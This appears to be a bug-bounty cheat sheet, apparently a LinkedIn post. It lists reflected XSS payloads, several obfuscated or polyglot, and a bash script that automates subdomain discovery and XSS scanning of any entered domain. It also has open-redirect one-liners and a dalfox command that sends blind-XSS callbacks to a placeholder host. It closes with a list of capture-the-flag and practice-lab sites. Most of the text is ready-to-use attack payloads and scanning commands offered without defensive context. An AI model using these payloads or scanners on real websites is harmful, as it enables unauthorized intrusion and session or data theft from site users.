Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
Simple Reflected XSS
1. subfinder -d target.com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxss
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d "$domain" | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxss
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxss >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
Toxicache
Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
https://lnkd.in/gdtpJGmT
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0.1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
Useful XSS payloads:
"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"
data:text/html,<script>alert(1)</script>
<select><noembed></select><script x='a@b'a>
Cyber Security Lab Practice, RED & BLUE Team.
Attack-Defense - https://attackdefense.com
Alert to win - https://aalf.nu/alert1
Bancocn - https://bancocn.com
Buffer Overflow Labs - https://lnkd.in/eNbEWYh
CTF Komodo Security - https://ctf.komodosec.com
CryptoHack - https://cryptohack.org/
CMD Challenge - https://cmdchallenge.com
Exploitation Education - https://exploit.education
Google CTF - https://lnkd.in/e46drbz8
HackTheBox - Dr. AITH - https://www.hackthebox.com
Hackthis - https://www.hackthis.co.uk
Hacksplaining - https://lnkd.in/eAB5CSTA
Hacker101 - https://ctf.hacker101.com
Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
Hacking-Lab - https://hacking-lab.com/
ImmersiveLabs - https://immersivelabs.com
NewbieContest - https://lnkd.in/ewBk6fU5
OverTheWire - https://overthewire.org
Practical Pentest Labs - https://lnkd.in/esq9Yuv5
Pentestlab - https://pentesterlab.com
Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
PentestIT LAB - https://lab.pentestit.ru
PicoCTF - https://picoctf.com
PWNABLE - https://lnkd.in/eMEwBJzn
Root-Me - https://www.root-me.org
Root in Jail - https://rootinjail.com
SANS Challenger - https://lnkd.in/e5TAMawK
SmashTheStack - https://lnkd.in/eVn9rP9p
The Cryptopals Crypto Challenges - https://cryptopals.com
Try Hack Me - https://tryhackme.com
Vulnhub - https://www.vulnhub.com
Vulnmachine - https://lnkd.in/eJ2e_kD
W3Challs - https://w3challs.com
WeChall - https://www.wechall.net
Websploit - https://websploit.org/
Zenk-Security - https://lnkd.in/ewJ5rNx2
Cyberdefenders - https://lnkd.in/dVcmjEw8
LetsDefend - https://letsdefend.io/